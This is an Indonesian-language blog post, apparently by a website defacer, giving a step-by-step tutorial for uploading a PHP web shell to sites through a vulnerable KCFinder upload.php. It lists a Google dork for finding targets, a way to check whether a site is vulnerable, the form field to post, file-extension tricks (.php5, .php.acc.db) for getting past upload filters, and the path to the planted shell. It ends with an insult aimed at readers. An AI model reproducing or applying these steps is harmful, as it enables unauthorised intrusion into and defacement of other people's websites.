Kali ini w Admin Paduka Tamvan mau post Tutorial Deface Kcfinder Upload Shell ok
POC ini Poc Up Shell pertama yang gw bisa dan di ajarin oleh tmen saya Z-I SLOW :v
BAHAN =
- Dork : inurl:/modules/kcfinder/
- Exploit : www.target.com/[path]/modules/kcfinder/upload.php
- CSRF : Don't Kill Me,I Have A Cat :(
- Kopi
- Nekopoi.band
STEP BY STEP :
- Dorking di google
- Masukin exploit www.target.com/modules/kcfinder/upload.php
- Kalau blank dan muncul alert "unknow error" berartu vuln y, lanjut pergi ke CSRF. Masukin link target kamu di bagian URL, dibagian Post File isi " Filedata "
- Klik kunci target, setelah itu upload shell kalian dengan extensi .php.acc.db atau .php5
- Akses shell kalian
- www.target.com/modules/kcfiner/upload/file/shell.php5
Sekian terimakasih :) SEMOGA KECYDUK LU KIMAK >:(
0 comments: